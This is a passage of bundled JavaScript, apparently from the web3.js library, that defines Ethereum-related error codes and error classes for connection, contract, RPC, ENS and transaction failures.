t.ERR_CONN_MAX_ATTEMPTS = t.ERR_CONN_CLOSE = t.ERR_CONN_NOT_OPEN = t.ERR_CONN_TIMEOUT = t.ERR_CONN_INVALID = t.ERR_CONN = t.ERR_TX_INVALID_PROPERTIES_FOR_TYPE = t.ERR_TX_REVERT_TRANSACTION_CUSTOM_ERROR = t.ERR_TX_INVALID_RECEIVER = t.ERR_TX_HARDFORK_MISMATCH = t.ERR_TX_CHAIN_MISMATCH = t.ERR_TX_GAS_MISMATCH = t.ERR_TX_SIGNING = t.ERR_TX_BLOCK_TIMEOUT = t.ERR_TX_SEND_TIMEOUT = t.ERR_TX_NOT_FOUND = t.ERR_TX_LOCAL_WALLET_NOT_AVAILABLE = t.ERR_TX_RECEIPT_MISSING_BLOCK_NUMBER = void 0, t.ERR_RPC_NOT_SUPPORTED = t.ERR_RPC_LIMIT_EXCEEDED = t.ERR_RPC_UNSUPPORTED_METHOD = t.ERR_RPC_TRANSACTION_REJECTED = t.ERR_RPC_UNAVAILABLE_RESOURCE = t.ERR_RPC_MISSING_RESOURCE = t.ERR_RPC_INVALID_INPUT = t.ERR_RPC_INTERNAL_ERROR = t.ERR_RPC_INVALID_PARAMS = t.ERR_RPC_INVALID_METHOD = t.ERR_RPC_INVALID_REQUEST = t.ERR_RPC_INVALID_JSON = t.ERR_CORE_CHAIN_MISMATCH = t.ERR_CORE_HARDFORK_MISMATCH = t.ERR_VALIDATION = t.ERR_INVALID_NIBBLE_WIDTH = t.ERR_INVALID_TYPE_ABI = t.ERR_INVALID_BLOCK = t.ERR_INVALID_LARGE_VALUE = t.ERR_INVALID_SIZE = t.ERR_INVALID_UNSIGNED_INTEGER = t.ERR_INVALID_BOOLEAN = t.ERR_INVALID_TYPE = t.ERR_INVALID_HEX = void 0, t.ERR_RESPONSE = 100, t.ERR_INVALID_RESPONSE = 101, t.ERR_PARAM = 200, t.ERR_FORMATTERS = 201, t.ERR_METHOD_NOT_IMPLEMENTED = 202, t.ERR_OPERATION_TIMEOUT = 203, t.ERR_OPERATION_ABORT = 204, t.ERR_ABI_ENCODING = 205, t.ERR_EXISTING_PLUGIN_NAMESPACE = 206, t.ERR_INVALID_METHOD_PARAMS = 207, t.ERR_CONTRACT = 300, t.ERR_CONTRACT_RESOLVER_MISSING = 301, t.ERR_CONTRACT_ABI_MISSING = 302, t.ERR_CONTRACT_REQUIRED_CALLBACK = 303, t.ERR_CONTRACT_EVENT_NOT_EXISTS = 304, t.ERR_CONTRACT_RESERVED_EVENT = 305, t.ERR_CONTRACT_MISSING_DEPLOY_DATA = 306, t.ERR_CONTRACT_MISSING_ADDRESS = 307, t.ERR_CONTRACT_MISSING_FROM_ADDRESS = 308, t.ERR_CONTRACT_INSTANTIATION = 309, t.ERR_CONTRACT_EXECUTION_REVERTED = 310, t.ERR_CONTRACT_TX_DATA_AND_INPUT = 311, t.ERR_TX = 400, t.ERR_TX_REVERT_INSTRUCTION = 401, t.ERR_TX_REVERT_TRANSACTION = 402, t.ERR_TX_NO_CONTRACT_ADDRESS = 403, t.ERR_TX_CONTRACT_NOT_STORED = 404, t.ERR_TX_REVERT_WITHOUT_REASON = 405, t.ERR_TX_OUT_OF_GAS = 406, t.ERR_RAW_TX_UNDEFINED = 407, t.ERR_TX_INVALID_SENDER = 408, t.ERR_TX_INVALID_CALL = 409, t.ERR_TX_MISSING_CUSTOM_CHAIN = 410, t.ERR_TX_MISSING_CUSTOM_CHAIN_ID = 411, t.ERR_TX_CHAIN_ID_MISMATCH = 412, t.ERR_TX_INVALID_CHAIN_INFO = 413, t.ERR_TX_MISSING_CHAIN_INFO = 414, t.ERR_TX_MISSING_GAS = 415, t.ERR_TX_INVALID_LEGACY_GAS = 416, t.ERR_TX_INVALID_FEE_MARKET_GAS = 417, t.ERR_TX_INVALID_FEE_MARKET_GAS_PRICE = 418, t.ERR_TX_INVALID_LEGACY_FEE_MARKET = 419, t.ERR_TX_INVALID_OBJECT = 420, t.ERR_TX_INVALID_NONCE_OR_CHAIN_ID = 421, t.ERR_TX_UNABLE_TO_POPULATE_NONCE = 422, t.ERR_TX_UNSUPPORTED_EIP_1559 = 423, t.ERR_TX_UNSUPPORTED_TYPE = 424, t.ERR_TX_DATA_AND_INPUT = 425, t.ERR_TX_POLLING_TIMEOUT = 426, t.ERR_TX_RECEIPT_MISSING_OR_BLOCKHASH_NULL = 427, t.ERR_TX_RECEIPT_MISSING_BLOCK_NUMBER = 428, t.ERR_TX_LOCAL_WALLET_NOT_AVAILABLE = 429, t.ERR_TX_NOT_FOUND = 430, t.ERR_TX_SEND_TIMEOUT = 431, t.ERR_TX_BLOCK_TIMEOUT = 432, t.ERR_TX_SIGNING = 433, t.ERR_TX_GAS_MISMATCH = 434, t.ERR_TX_CHAIN_MISMATCH = 435, t.ERR_TX_HARDFORK_MISMATCH = 436, t.ERR_TX_INVALID_RECEIVER = 437, t.ERR_TX_REVERT_TRANSACTION_CUSTOM_ERROR = 438, t.ERR_TX_INVALID_PROPERTIES_FOR_TYPE = 439, t.ERR_CONN = 500, t.ERR_CONN_INVALID = 501, t.ERR_CONN_TIMEOUT = 502, t.ERR_CONN_NOT_OPEN = 503, t.ERR_CONN_CLOSE = 504, t.ERR_CONN_MAX_ATTEMPTS = 505, t.ERR_CONN_PENDING_REQUESTS = 506, t.ERR_REQ_ALREADY_SENT = 507, t.ERR_PROVIDER = 600, t.ERR_INVALID_PROVIDER = 601, t.ERR_INVALID_CLIENT = 602, t.ERR_SUBSCRIPTION = 603, t.ERR_WS_PROVIDER = 604, t.ERR_PRIVATE_KEY_LENGTH = 701, t.ERR_INVALID_PRIVATE_KEY = 702, t.ERR_UNSUPPORTED_KDF = 703, t.ERR_KEY_DERIVATION_FAIL = 704, t.ERR_KEY_VERSION_UNSUPPORTED = 705, t.ERR_INVALID_PASSWORD = 706, t.ERR_IV_LENGTH = 707, t.ERR_INVALID_KEYSTORE = 708, t.ERR_PBKDF2_ITERATIONS = 709, t.ERR_SIGNATURE_FAILED = 801, t.ERR_INVALID_SIGNATURE = 802, t.GENESIS_BLOCK_NUMBER = "0x0", t.JSONRPC_ERR_REJECTED_REQUEST = 4001, t.JSONRPC_ERR_UNAUTHORIZED = 4100, t.JSONRPC_ERR_UNSUPPORTED_METHOD = 4200, t.JSONRPC_ERR_DISCONNECTED = 4900, t.JSONRPC_ERR_CHAIN_DISCONNECTED = 4901, t.ERR_ENS_CHECK_INTERFACE_SUPPORT = 901, t.ERR_ENS_UNSUPPORTED_NETWORK = 902, t.ERR_ENS_NETWORK_NOT_SYNCED = 903, t.ERR_INVALID_STRING = 1001, t.ERR_INVALID_BYTES = 1002, t.ERR_INVALID_NUMBER = 1003, t.ERR_INVALID_UNIT = 1004, t.ERR_INVALID_ADDRESS = 1005, t.ERR_INVALID_HEX = 1006, t.ERR_INVALID_TYPE = 1007, t.ERR_INVALID_BOOLEAN = 1008, t.ERR_INVALID_UNSIGNED_INTEGER = 1009, t.ERR_INVALID_SIZE = 1010, t.ERR_INVALID_LARGE_VALUE = 1011, t.ERR_INVALID_BLOCK = 1012, t.ERR_INVALID_TYPE_ABI = 1013, t.ERR_INVALID_NIBBLE_WIDTH = 1014, t.ERR_VALIDATION = 1100, t.ERR_CORE_HARDFORK_MISMATCH = 1101, t.ERR_CORE_CHAIN_MISMATCH = 1102, t.ERR_RPC_INVALID_JSON = -32700, t.ERR_RPC_INVALID_REQUEST = -32600, t.ERR_RPC_INVALID_METHOD = -32601, t.ERR_RPC_INVALID_PARAMS = -32602, t.ERR_RPC_INTERNAL_ERROR = -32603, t.ERR_RPC_INVALID_INPUT = -32000, t.ERR_RPC_MISSING_RESOURCE = -32001, t.ERR_RPC_UNAVAILABLE_RESOURCE = -32002, t.ERR_RPC_TRANSACTION_REJECTED = -32003, t.ERR_RPC_UNSUPPORTED_METHOD = -32004, t.ERR_RPC_LIMIT_EXCEEDED = -32005, t.ERR_RPC_NOT_SUPPORTED = -32006;
            },
            8105: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.PBKDF2IterationsError = t.IVLengthError = t.InvalidPasswordError = t.KeyStoreVersionError = t.KeyDerivationError = t.InvalidKdfError = t.InvalidSignatureError = t.InvalidPrivateKeyError = t.PrivateKeyLengthError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(){
                        super("Private key must be 32 bytes."), this.code = n.ERR_PRIVATE_KEY_LENGTH;
                    }
                }
                t.PrivateKeyLengthError = o;
                class s extends i.BaseWeb3Error {
                    constructor(){
                        super("Invalid Private Key, Not a valid string or uint8Array"), this.code = n.ERR_INVALID_PRIVATE_KEY;
                    }
                }
                t.InvalidPrivateKeyError = s;
                class a extends i.BaseWeb3Error {
                    constructor(e){
                        super(`"${e}"`), this.code = n.ERR_INVALID_SIGNATURE;
                    }
                }
                t.InvalidSignatureError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super("Invalid key derivation function"), this.code = n.ERR_UNSUPPORTED_KDF;
                    }
                }
                t.InvalidKdfError = u;
                class c extends i.BaseWeb3Error {
                    constructor(){
                        super("Key derivation failed - possibly wrong password"), this.code = n.ERR_KEY_DERIVATION_FAIL;
                    }
                }
                t.KeyDerivationError = c;
                class l extends i.BaseWeb3Error {
                    constructor(){
                        super("Unsupported key store version"), this.code = n.ERR_KEY_VERSION_UNSUPPORTED;
                    }
                }
                t.KeyStoreVersionError = l;
                class d extends i.BaseWeb3Error {
                    constructor(){
                        super("Password cannot be empty"), this.code = n.ERR_INVALID_PASSWORD;
                    }
                }
                t.InvalidPasswordError = d;
                class h extends i.BaseWeb3Error {
                    constructor(){
                        super("Initialization vector must be 16 bytes"), this.code = n.ERR_IV_LENGTH;
                    }
                }
                t.IVLengthError = h;
                class f extends i.BaseWeb3Error {
                    constructor(){
                        super("c > 1000, pbkdf2 is less secure with less iterations"), this.code = n.ERR_PBKDF2_ITERATIONS;
                    }
                }
                t.PBKDF2IterationsError = f;
            },
            3789: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.RequestAlreadySentError = t.PendingRequestsOnReconnectingError = t.MaxAttemptsReachedOnReconnectingError = t.ConnectionCloseError = t.ConnectionNotOpenError = t.ConnectionTimeoutError = t.InvalidConnectionError = t.ConnectionError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(e), this.code = n.ERR_CONN, t && (this.errorCode = t.code, this.errorReason = t.reason);
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            errorCode: this.errorCode,
                            errorReason: this.errorReason
                        });
                    }
                }
                t.ConnectionError = o, t.InvalidConnectionError = class extends o {
                    constructor(e, t){
                        super(`CONNECTION ERROR: Couldn't connect to node ${e}.`, t), this.host = e, this.code = n.ERR_CONN_INVALID;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            host: this.host
                        });
                    }
                }, t.ConnectionTimeoutError = class extends o {
                    constructor(e){
                        super(`CONNECTION TIMEOUT: timeout of ${e}ms achieved`), this.duration = e, this.code = n.ERR_CONN_TIMEOUT;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            duration: this.duration
                        });
                    }
                }, t.ConnectionNotOpenError = class extends o {
                    constructor(e){
                        super("Connection not open", e), this.code = n.ERR_CONN_NOT_OPEN;
                    }
                }, t.ConnectionCloseError = class extends o {
                    constructor(e){
                        var t, r;
                        super(`CONNECTION ERROR: The connection got closed with the close code ${null !== (t = null == e ? void 0 : e.code) && void 0 !== t ? t : ""} and the following reason string ${null !== (r = null == e ? void 0 : e.reason) && void 0 !== r ? r : ""}`, e), this.code = n.ERR_CONN_CLOSE;
                    }
                }, t.MaxAttemptsReachedOnReconnectingError = class extends o {
                    constructor(e){
                        super(`Maximum number of reconnect attempts reached! (${e})`), this.code = n.ERR_CONN_MAX_ATTEMPTS;
                    }
                }, t.PendingRequestsOnReconnectingError = class extends o {
                    constructor(){
                        super("CONNECTION ERROR: Provider started to reconnect before the response got received!"), this.code = n.ERR_CONN_PENDING_REQUESTS;
                    }
                }, t.RequestAlreadySentError = class extends o {
                    constructor(e){
                        super(`Request already sent with following id: ${e}`), this.code = n.ERR_REQ_ALREADY_SENT;
                    }
                };
            },
            510: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ContractTransactionDataAndInputError = t.ContractExecutionError = t.Eip838ExecutionError = t.ContractInstantiationError = t.ContractNoFromAddressDefinedError = t.ContractNoAddressDefinedError = t.ContractMissingDeployDataError = t.ContractReservedEventError = t.ContractEventDoesNotExistError = t.ContractOnceRequiresCallbackError = t.ContractMissingABIError = t.ResolverMethodMissingError = t.Web3ContractError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(e), this.code = n.ERR_CONTRACT, this.receipt = t;
                    }
                }
                t.Web3ContractError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(`The resolver at ${e} does not implement requested method: "${t}".`), this.address = e, this.name = t, this.code = n.ERR_CONTRACT_RESOLVER_MISSING;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            address: this.address,
                            name: this.name
                        });
                    }
                }
                t.ResolverMethodMissingError = s;
                class a extends i.BaseWeb3Error {
                    constructor(){
                        super("You must provide the json interface of the contract when instantiating a contract object."), this.code = n.ERR_CONTRACT_ABI_MISSING;
                    }
                }
                t.ContractMissingABIError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super("Once requires a callback as the second parameter."), this.code = n.ERR_CONTRACT_REQUIRED_CALLBACK;
                    }
                }
                t.ContractOnceRequiresCallbackError = u;
                class c extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Event "${e}" doesn't exist in this contract.`), this.eventName = e, this.code = n.ERR_CONTRACT_EVENT_NOT_EXISTS;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            eventName: this.eventName
                        });
                    }
                }
                t.ContractEventDoesNotExistError = c;
                class l extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Event "${e}" doesn't exist in this contract.`), this.type = e, this.code = n.ERR_CONTRACT_RESERVED_EVENT;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            type: this.type
                        });
                    }
                }
                t.ContractReservedEventError = l;
                class d extends i.BaseWeb3Error {
                    constructor(){
                        super('No "data" specified in neither the given options, nor the default options.'), this.code = n.ERR_CONTRACT_MISSING_DEPLOY_DATA;
                    }
                }
                t.ContractMissingDeployDataError = d;
                class h extends i.BaseWeb3Error {
                    constructor(){
                        super("This contract object doesn't have address set yet, please set an address first."), this.code = n.ERR_CONTRACT_MISSING_ADDRESS;
                    }
                }
                t.ContractNoAddressDefinedError = h;
                class f extends i.BaseWeb3Error {
                    constructor(){
                        super('No "from" address specified in neither the given options, nor the default options.'), this.code = n.ERR_CONTRACT_MISSING_FROM_ADDRESS;
                    }
                }
                t.ContractNoFromAddressDefinedError = f;
                class p extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_CONTRACT_INSTANTIATION;
                    }
                }
                t.ContractInstantiationError = p;
                class m extends o {
                    constructor(e){
                        if (super(e.message || "Error"), this.name = "name" in e && e.name || this.constructor.name, this.stack = "stack" in e && e.stack || void 0, this.code = e.code, "object" == typeof e.data) {
                            let t;
                            t = "originalError" in e.data ? e.data.originalError : e.data, this.data = t.data, this.innerError = new m(t);
                        } else this.data = e.data;
                    }
                    setDecodedProperties(e, t, r) {
                        this.errorName = e, this.errorSignature = t, this.errorArgs = r;
                    }
                    toJSON() {
                        let e = Object.assign(Object.assign({}, super.toJSON()), {
                            data: this.data
                        });
                        return this.errorName && (e = Object.assign(Object.assign({}, e), {
                            errorName: this.errorName,
                            errorSignature: this.errorSignature,
                            errorArgs: this.errorArgs
                        })), e;
                    }
                }
                t.Eip838ExecutionError = m, t.ContractExecutionError = class extends o {
                    constructor(e){
                        super("Error happened while trying to execute a function inside a smart contract"), this.code = n.ERR_CONTRACT_EXECUTION_REVERTED, this.innerError = new m(e);
                    }
                };
                class g extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`data: ${null !== (t = e.data) && void 0 !== t ? t : "undefined"}, input: ${null !== (r = e.input) && void 0 !== r ? r : "undefined"}`, 'You can\'t have "data" and "input" as properties of a contract at the same time, please use either "data" or "input" instead.'), this.code = n.ERR_CONTRACT_TX_DATA_AND_INPUT;
                    }
                }
                t.ContractTransactionDataAndInputError = g;
            },
            3628: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ConfigChainMismatchError = t.ConfigHardforkMismatchError = void 0;
                const n = r(3685), i = r(7639);
                class o extends n.BaseWeb3Error {
                    constructor(e, t){
                        super(`Web3Config hardfork doesnt match in defaultHardfork ${e} and common.hardfork ${t}`), this.code = i.ERR_CORE_HARDFORK_MISMATCH;
                    }
                }
                t.ConfigHardforkMismatchError = o;
                class s extends n.BaseWeb3Error {
                    constructor(e, t){
                        super(`Web3Config chain doesnt match in defaultHardfork ${e} and common.hardfork ${t}`), this.code = i.ERR_CORE_HARDFORK_MISMATCH;
                    }
                }
                t.ConfigChainMismatchError = s;
            },
            1591: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ENSNetworkNotSyncedError = t.ENSUnsupportedNetworkError = t.ENSCheckInterfaceSupportError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e){
                        super(`ENS resolver check interface support error. "${e}"`), this.code = n.ERR_ENS_CHECK_INTERFACE_SUPPORT;
                    }
                }
                t.ENSCheckInterfaceSupportError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e){
                        super(`ENS is not supported on network ${e}`), this.code = n.ERR_ENS_UNSUPPORTED_NETWORK;
                    }
                }
                t.ENSUnsupportedNetworkError = s;
                class a extends i.BaseWeb3Error {
                    constructor(){
                        super("Network not synced"), this.code = n.ERR_ENS_NETWORK_NOT_SYNCED;
                    }
                }
                t.ENSNetworkNotSyncedError = a;
            },
            7297: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ExistingPluginNamespaceError = t.AbiError = t.OperationAbortError = t.OperationTimeoutError = t.MethodNotImplementedError = t.FormatterError = t.InvalidMethodParamsError = t.InvalidNumberOfParamsError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t, r){
                        super(`Invalid number of parameters for "${r}". Got "${e}" expected "${t}"!`), this.got = e, this.expected = t, this.method = r, this.code = n.ERR_PARAM;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            got: this.got,
                            expected: this.expected,
                            method: this.method
                        });
                    }
                }
                t.InvalidNumberOfParamsError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Invalid parameters passed. "${void 0 !== e ? e : ""}"`), this.hint = e, this.code = n.ERR_INVALID_METHOD_PARAMS;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            hint: this.hint
                        });
                    }
                }
                t.InvalidMethodParamsError = s;
                class a extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_FORMATTERS;
                    }
                }
                t.FormatterError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super("The method you're trying to call is not implemented."), this.code = n.ERR_METHOD_NOT_IMPLEMENTED;
                    }
                }
                t.MethodNotImplementedError = u;
                class c extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_OPERATION_TIMEOUT;
                    }
                }
                t.OperationTimeoutError = c;
                class l extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_OPERATION_ABORT;
                    }
                }
                t.OperationAbortError = l;
                class d extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_ABI_ENCODING;
                    }
                }
                t.AbiError = d;
                class h extends i.BaseWeb3Error {
                    constructor(e){
                        super(`A plugin with the namespace: ${e} has already been registered.`), this.code = n.ERR_EXISTING_PLUGIN_NAMESPACE;
                    }
                }
                t.ExistingPluginNamespaceError = h;
            },
            7108: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3WSProviderError = t.SubscriptionError = t.InvalidClientError = t.InvalidProviderError = t.ProviderError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_PROVIDER;
                    }
                }
                t.ProviderError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Provider with url "${e}" is not set or invalid`), this.clientUrl = e, this.code = n.ERR_INVALID_PROVIDER;
                    }
                }
                t.InvalidProviderError = s;
                class a extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Client URL "${e}" is invalid.`), this.code = n.ERR_INVALID_CLIENT;
                    }
                }
                t.InvalidClientError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_SUBSCRIPTION;
                    }
                }
                t.SubscriptionError = u;
                class c extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_WS_PROVIDER;
                    }
                }
                t.Web3WSProviderError = c;
            },
            9491: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidResponseError = t.ResponseError = void 0;
                const n = r(3685), i = r(7639), o = (e)=>((e)=>!(Array.isArray(e) || "2.0" !== e.jsonrpc || !e || void 0 !== e.result && null !== e.result || !("error" in e) || "number" != typeof e.id && "string" != typeof e.id))(e) ? e.error.message : "";
                class s extends n.BaseWeb3Error {
                    constructor(e, t, r){
                        var n;
                        super(null != t ? t : `Returned error: ${Array.isArray(e) ? e.map((e)=>o(e)).join(",") : o(e)}`), this.code = i.ERR_RESPONSE, t || (this.data = Array.isArray(e) ? e.map((e)=>{
                            var t;
                            return null === (t = e.error) || void 0 === t ? void 0 : t.data;
                        }) : null === (n = null == e ? void 0 : e.error) || void 0 === n ? void 0 : n.data), this.request = r;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            data: this.data,
                            request: this.request
                        });
                    }
                }
                t.ResponseError = s, t.InvalidResponseError = class extends s {
                    constructor(e, t){
                        let r;
                        super(e, void 0, t), this.code = i.ERR_INVALID_RESPONSE, "error" in e ? r = e.error : e instanceof Array && (r = e.map((e)=>e.error)), this.innerError = r;
                    }
                };
            },
            655: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.rpcErrorsMap = t.LimitExceededError = t.TransactionRejectedError = t.VersionNotSupportedError = t.ResourcesNotFoundError = t.ResourceUnavailableError = t.MethodNotSupported = t.InvalidInputError = t.InternalError = t.InvalidParamsError = t.MethodNotFoundError = t.InvalidRequestError = t.ParseError = t.RpcError = void 0;
                const n = r(3685), i = r(7639);
                class o extends n.BaseWeb3Error {
                    constructor(e, t){
                        super(null != t ? t : `An Rpc error has occured with a code of ${e.error.code}`), this.code = e.error.code, this.id = e.id, this.jsonrpc = e.jsonrpc, this.jsonRpcError = e.error;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            error: this.jsonRpcError,
                            id: this.id,
                            jsonRpc: this.jsonrpc
                        });
                    }
                }
                t.RpcError = o;
                class s extends o {
                    constructor(e){
                        super(e, "Parse error"), this.code = i.ERR_RPC_INVALID_JSON;
                    }
                }
                t.ParseError = s;
                class a extends o {
                    constructor(e){
                        super(e, "Invalid request"), this.code = i.ERR_RPC_INVALID_REQUEST;
                    }
                }
                t.InvalidRequestError = a;
                class u extends o {
                    constructor(e){
                        super(e, "Method not found"), this.code = i.ERR_RPC_INVALID_METHOD;
                    }
                }
                t.MethodNotFoundError = u;
                class c extends o {
                    constructor(e){
                        super(e, "Invalid request"), this.code = i.ERR_RPC_INVALID_PARAMS;
                    }
                }
                t.InvalidParamsError = c;
                class l extends o {
                    constructor(e){
                        super(e, "Internal error"), this.code = i.ERR_RPC_INTERNAL_ERROR;
                    }
                }
                t.InternalError = l;
                class d extends o {
                    constructor(e){
                        super(e, "Invalid input"), this.code = i.ERR_RPC_INVALID_INPUT;
                    }
                }
                t.InvalidInputError = d;
                class h extends o {
                    constructor(e){
                        super(e, "Method not supported"), this.code = i.ERR_RPC_UNSUPPORTED_METHOD;
                    }
                }
                t.MethodNotSupported = h;
                class f extends o {
                    constructor(e){
                        super(e, "Resource unavailable"), this.code = i.ERR_RPC_UNAVAILABLE_RESOURCE;
                    }
                }
                t.ResourceUnavailableError = f;
                class p extends o {
                    constructor(e){
                        super(e, "Resource not found"), this.code = i.ERR_RPC_MISSING_RESOURCE;
                    }
                }
                t.ResourcesNotFoundError = p;
                class m extends o {
                    constructor(e){
                        super(e, "JSON-RPC version not supported"), this.code = i.ERR_RPC_NOT_SUPPORTED;
                    }
                }
                t.VersionNotSupportedError = m;
                class g extends o {
                    constructor(e){
                        super(e, "Transaction rejected"), this.code = i.ERR_RPC_TRANSACTION_REJECTED;
                    }
                }
                t.TransactionRejectedError = g;
                class y extends o {
                    constructor(e){
                        super(e, "Limit exceeded"), this.code = i.ERR_RPC_LIMIT_EXCEEDED;
                    }
                }
                t.LimitExceededError = y, t.rpcErrorsMap = new Map, t.rpcErrorsMap.set(i.ERR_RPC_INVALID_JSON, {
                    error: s
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_REQUEST, {
                    error: a
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_METHOD, {
                    error: u
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_PARAMS, {
                    error: c
                }), t.rpcErrorsMap.set(i.ERR_RPC_INTERNAL_ERROR, {
                    error: l
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_INPUT, {
                    error: d
                }), t.rpcErrorsMap.set(i.ERR_RPC_UNSUPPORTED_METHOD, {
                    error: h
                }), t.rpcErrorsMap.set(i.ERR_RPC_UNAVAILABLE_RESOURCE, {
                    error: f
                }), t.rpcErrorsMap.set(i.ERR_RPC_TRANSACTION_REJECTED, {
                    error: g
                }), t.rpcErrorsMap.set(i.ERR_RPC_MISSING_RESOURCE, {
                    error: p
                }), t.rpcErrorsMap.set(i.ERR_RPC_NOT_SUPPORTED, {
                    error: m
                }), t.rpcErrorsMap.set(i.ERR_RPC_LIMIT_EXCEEDED, {
                    error: y
                });
            },
            1075: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SignatureError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.InvalidValueError {
                    constructor(){
                        super(...arguments), this.code = n.ERR_SIGNATURE_FAILED;
                    }
                }
                t.SignatureError = o;
            },
            8450: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidPropertiesForTransactionTypeError = t.LocalWalletNotAvailableError = t.TransactionSigningError = t.TransactionReceiptMissingBlockNumberError = t.TransactionMissingReceiptOrBlockHashError = t.TransactionBlockTimeoutError = t.TransactionPollingTimeoutError = t.TransactionSendTimeoutError = t.TransactionDataAndInputError = t.UnsupportedTransactionTypeError = t.Eip1559NotSupportedError = t.UnableToPopulateNonceError = t.InvalidNonceOrChainIdError = t.InvalidTransactionObjectError = t.UnsupportedFeeMarketError = t.Eip1559GasPriceError = t.InvalidMaxPriorityFeePerGasOrMaxFeePerGas = t.InvalidGasOrGasPrice = t.TransactionGasMismatchError = t.MissingGasError = t.MissingChainOrHardforkError = t.CommonOrChainAndHardforkError = t.HardforkMismatchError = t.ChainMismatchError = t.ChainIdMismatchError = t.MissingCustomChainIdError = t.MissingCustomChainError = t.InvalidTransactionCall = t.InvalidTransactionWithReceiver = t.InvalidTransactionWithSender = t.TransactionNotFound = t.UndefinedRawTransactionError = t.TransactionOutOfGasError = t.TransactionRevertedWithoutReasonError = t.ContractCodeNotStoredError = t.NoContractAddressFoundError = t.TransactionRevertWithCustomError = t.TransactionRevertInstructionError = t.RevertInstructionError = t.TransactionError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(e), this.receipt = t, this.code = n.ERR_TX;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            receipt: this.receipt
                        });
                    }
                }
                t.TransactionError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(`Your request got reverted with the following reason string: ${e}`), this.reason = e, this.signature = t, this.code = n.ERR_TX_REVERT_INSTRUCTION;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            reason: this.reason,
                            signature: this.signature
                        });
                    }
                }
                t.RevertInstructionError = s;
                class a extends i.BaseWeb3Error {
                    constructor(e, t, r, o){
                        super("Transaction has been reverted by the EVM" + (void 0 === r ? "" : `:\n ${i.BaseWeb3Error.convertToString(r)}`)), this.reason = e, this.signature = t, this.receipt = r, this.data = o, this.code = n.ERR_TX_REVERT_TRANSACTION;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            reason: this.reason,
                            signature: this.signature,
                            receipt: this.receipt,
                            data: this.data
                        });
                    }
                }
                t.TransactionRevertInstructionError = a, t.TransactionRevertWithCustomError = class extends a {
                    constructor(e, t, r, i, o, s, a){
